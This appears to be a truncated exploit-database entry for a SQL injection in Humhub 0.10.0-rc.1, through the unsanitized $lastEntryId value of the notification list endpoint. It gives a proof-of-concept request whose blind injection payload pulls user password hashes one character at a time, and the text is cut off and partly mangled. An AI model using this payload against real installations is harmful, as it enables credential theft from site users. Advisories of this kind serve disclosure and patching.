Humhub 0.10.0-rc.1 - SQL Injection

Exploit Title: Humhub condition is injected with the otherwise unsanitized $lastEntryId, which can be any SQL injection. Proof of Concept: Performing the following request index.php?r=notification/list/index&from=999 AND CASE WHEN 0x30SELECT substringpassword,1,1 FROM userpassword WHERE id = 1 TH...